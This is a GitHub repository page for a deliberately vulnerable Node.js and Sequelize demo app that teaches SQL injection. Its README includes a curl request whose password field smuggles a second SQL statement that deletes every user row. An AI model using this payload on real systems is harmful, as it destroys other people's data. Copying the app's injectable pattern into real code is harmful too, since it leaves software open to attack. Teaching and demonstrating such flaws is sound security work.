Skip to content
/ sqli-sequelize-mariadb Public

This application is a demonstration prototype just to show how to perform SQLi attack.

License

MIT license
1 star 13 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

0xdbe-appsec/sqli-sequelize-mariadb

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
bin
bin
 
 
config
config
 
 
models
models
 
 
public
public
 
 
routes
routes
 
 
test
test
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
app.js
app.js
 
 
database.sql
database.sql
 
 
package-lock.json
package-lock.json
 
 
package.json
package.json
 
 

Repository files navigation

SQL Injection with Sequelize

This application is a demonstration prototype just to show how to perform SQLi attack.

Install

  • Install node modules
npm install
  • Create database
sudo -u root mysql -u root < database.sql
  • Set env vars (in .env file)
DB_PASSWORD=p4ssw0rd
  • Run
npm start

Usage

  • Create user
curl --header "Content-Type: application/json" \
    --request POST \
    --data '{"name":"Frodon Saque","password":"azerty"}' \
    http://localhost:3000/users
  • Use SQL Injection to drop all users
curl --header "Content-Type: application/json" \
    --request POST \
    --data '{"name":"Frodon Saque","password":"azerty'\''); DELETE FROM user; -- "}' \
    http://localhost:3000/users

What still needs to be done

  • Add get users controller

About

This application is a demonstration prototype just to show how to perform SQLi attack.

Resources

Readme

License

MIT license
Activity
Custom properties

Stars

1 star

Watchers

1 watching

Forks

13 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages